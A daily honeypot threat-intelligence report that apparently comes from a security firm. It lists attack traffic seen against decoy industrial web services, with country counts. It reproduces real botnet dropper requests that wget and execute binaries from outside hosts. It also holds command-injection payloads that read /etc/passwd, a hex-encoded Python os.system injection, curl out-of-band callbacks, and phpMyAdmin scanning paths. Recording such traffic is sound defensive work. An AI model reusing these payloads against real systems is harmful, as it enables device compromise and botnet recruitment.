Skip to main content
  1. Daily-Posts/

Report: 2025-05-27

·487 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-05-27
#

Executive summary
#

interaction report on http service of various Hhoneypot around the world.

executive_summary
#

In today’s repport, we detected 2 stage 1 IP address(es), linked to 2 dropper URL(s).

There are 44 new requests that have never been observed before (these were added to the monitored request database.).

A total of 901 requests were recorded during the day, originating from 2 different countries, with a peak of 237 requests coming from US.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
SGGermany
IDGermany
BRGermany
USGermany
SGGermany
USGermany
BRGermany

botnet_dropper_behaviour
#

remote_addrrequest
41.220.172.226GET /shell?cd+/tmp;rm+-rf+*;wget+ 45.153.34.62/jaws;sh+/tmp/jaws HTTP/1.1
176.65.148.236POST /device.rsp?opt=sys&cmd=S_O_S_T_R_E_A_MAX&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20-rf%20neon.arm7%3B%20wget%20http%3A%2F%2F209.141.34.106%2Fdwrioej%2Fneon.arm7%3B%20chmod%20777%20neon.arm7%3B%20.%2Fneon.arm7%20router1 HTTP/1.1

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
264GET /public/css/2xcyvtr7m1fGQHcmRkDpum7Zpez.css HTTP/1.1
304GET /file/bcxj0I.txt HTTP/1.1
454GET /include/rjus.txt HTTP/1.1
484GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Erjus.txt HTTP/1.1
514GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f20224d6e686a65585a75545446735630746d62334232547a497a56334a335a32316b627a5a6122207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1
702GET /include/makecvs.php?Event=%60curl+http%3a//d0q39sn0prvpilv9a4p0jz6zhz9uszqtq.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1
722GET /MyAdmin/scripts/setup.php HTTP/1.1
742GET /include/makecvs.php?Event=%60curl+http%3a//d0q39sn0prvpilv9a4p0tiqp1ugqp5msa.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1
762GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0q39sn0prvpilv9a4p0iza1keo3pfgjj.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1
792GET /upload/userfiles/image/2xcyvtaGxB88bWp4UkDW4fLAZ7H.png HTTP/1.1
832GET /assets/data/usrimg/2xcyvof60o6svccutewai3ydeou.php HTTP/1.1
862GET /tos/index.php?explorer/pathList&path=%60curl+http%3a//d0q39sn0prvpilv9a4p05hgs985z4eew4.oast.online+-H+‘User-Agent%3a+qBK4al’%60 HTTP/1.1
1081GET /marketplace/api/marketplace/dashboard/recently-listed?count=14 HTTP/1.1
1251\x00\x00\x00j\xFESMB@\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x02\x00\x03\x02\x03
1271GET /Qqa9 HTTP/1.1
1281GET /AOUx HTTP/1.1
1291\x00\x0E8\xFBY}\xEB4’/\x85\x00\x00\x00\x00\x00
1391\x00\x0E\x08\x02\xD8\x88\xB9\x83kA\xE2\x00\x00\x00\x00\x00
1401\x00\x0E8\x02\xD8\x88\xB9\x83kA\xE2\x00\x00\x00\x00\x00
1501GET /admin/configs.php HTTP/1.0
1631\x00\x0E8\xA0\x84\xC4\xD4?1W\xE8\x00\x00\x00\x00\x00
2001\x00\x0E8\x7F
2051GET /phpMyAdmin-3.0.0.0-all-languages/scripts/setup.php HTTP/1.1
2061GET /phpMyAdmin-2.10.0.0/scripts/setup.php HTTP/1.1
2071GET /phpMyAdmin-2.11.11/scripts/setup.php HTTP/1.1
2091GET /phpMyAdmin-2.11.11.3/scripts/setup.ph HTTP/1.1
2111GET /my/scripts/setup.php HTTP/1.1
2121GET /PHPMYADMIN/scripts/setup.php HTTP/1.1
2171GET /mysqladmin/scripts/setup.php HTTP/1.1
2191GET /phpMyAdmin/scripts/setup.php HTTP/1.1
2201GET /phpadmin/scripts/setup.php HTTP/1.1
2221GET /sqladm/scripts/setup.php HTTP/1.1
2231GET /sqladmin/scripts/setup.php HTTP/1.1
2241GET /phpmyadmin/scripts/db.init.php HTTP/1.1
2251GET /phpMyAdmin/scripts/db.init.php HTTP/1.1
2261GET /database/scripts/setup.php HTTP/1.1
2271GET /phpAdmin/scripts/setup.php HTTP/1.1
2291GET /phpmyadmin2/scripts/setup.php HTTP/1.1
2301GET /pma/scripts/setup.php HTTP/1.1
2331\x00\x0E8Gw\x072#\xA5ai\x00\x00\x00\x00\x00
2381\x12\x01\x00&\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\xFF
2401SSH-2.0-WanScannerBot
2441\x00\x00\x00%\xFFSMBr\x00\x00\x00\x00\x18\x01(\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00
2471\x01\x00\x00\x00

country_iso_code
#

number_of_occurencecountry_iso_code
0237US
1198SA
2103DE
385PL
461BG
552NL
621IN
717CA
815GB
912AU
1012CZ
1110LT
128SG
137RU
146BE
156UA
165CN
174SC
184VN
194BR
204FR
214IL
223CH
233ID
243JP
253ES
262SE
272IE
281GH
291MZ
301MC
311PA
321IR
331RO
341AT
351PK
361AO
371KR

Related

Report: 2025-05-26
·354 words
Repport Daily
Report: 2025-05-25
·2459 words
Repport Daily
Report: 2025-05-24
·3208 words
Repport Daily